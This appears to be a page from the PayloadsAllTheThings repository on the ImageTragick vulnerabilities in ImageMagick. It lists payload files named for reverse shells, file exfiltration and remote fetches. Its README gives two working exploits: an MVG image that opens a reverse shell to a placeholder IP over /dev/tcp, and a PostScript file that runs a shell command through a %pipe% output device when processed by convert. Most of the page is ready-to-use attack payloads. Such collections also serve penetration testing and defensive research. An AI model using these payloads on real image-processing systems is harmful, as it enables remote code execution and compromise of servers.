PayloadsAllTheThings/Upload Insecure Files/CVE Image Tragik
2019-06-09 14:26:14 +02:00
..
imagetragik1_payload_imageover_file_exfiltration_pangu_wrapper.jpg Fix name's capitalization 2019-03-07 00:07:55 +01:00
imagetragik1_payload_imageover_file_exfiltration_text_wrapper.jpg Fix name's capitalization 2019-03-07 00:07:55 +01:00
imagetragik1_payload_imageover_reverse_shell_devtcp.jpg Fix name's capitalization 2019-03-07 00:07:55 +01:00
imagetragik1_payload_imageover_reverse_shell_netcat_fifo.png Fix name's capitalization 2019-03-07 00:07:55 +01:00
imagetragik1_payload_imageover_wget.gif Fix name's capitalization 2019-03-07 00:07:55 +01:00
imagetragik1_payload_url_bind_shell_nc.mvg Fix name's capitalization 2019-03-07 00:07:55 +01:00
imagetragik1_payload_url_curl.png Fix name's capitalization 2019-03-07 00:07:55 +01:00
imagetragik1_payload_url_portscan.jpg Fix name's capitalization 2019-03-07 00:07:55 +01:00
imagetragik1_payload_url_remote_connection.mvg Fix name's capitalization 2019-03-07 00:07:55 +01:00
imagetragik1_payload_url_reverse_shell_bash.mvg Fix name's capitalization 2019-03-07 00:07:55 +01:00
imagetragik1_payload_url_touch.jpg Fix name's capitalization 2019-03-07 00:07:55 +01:00
imagetragik1_payload_xml_reverse_shell_nctraditional.xml Fix name's capitalization 2019-03-07 00:07:55 +01:00
imagetragik1_payload_xml_reverse_shell_netcat_encoded.xml Fix name's capitalization 2019-03-07 00:07:55 +01:00
imagetragik2_burpcollaborator_passwd.jpg Meterpreter shell 2019-06-09 14:26:14 +02:00
imagetragik2_centos_id.jpg Fix name's capitalization 2019-03-07 00:07:55 +01:00
imagetragik2_ubuntu_id.jpg Fix name's capitalization 2019-03-07 00:07:55 +01:00
imagetragik2_ubuntu_shell.jpg Fix name's capitalization 2019-03-07 00:07:55 +01:00
README.md Fix name's capitalization 2019-03-07 00:07:55 +01:00

Image Tragik 1 & 2

Exploit v1

Simple reverse shell

push graphic-context
encoding "UTF-8"
viewbox 0 0 1 1
affine 1 0 0 1 0 0
push graphic-context
image Over 0,0 1,1 '|/bin/sh -i > /dev/tcp/ip/80 0<&1 2>&1'
pop graphic-context
pop graphic-context

Exploit v2

Simple id payload

%!PS
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%id) currentdevice putdeviceprops

then use convert shellexec.jpeg whatever.gif

Thanks to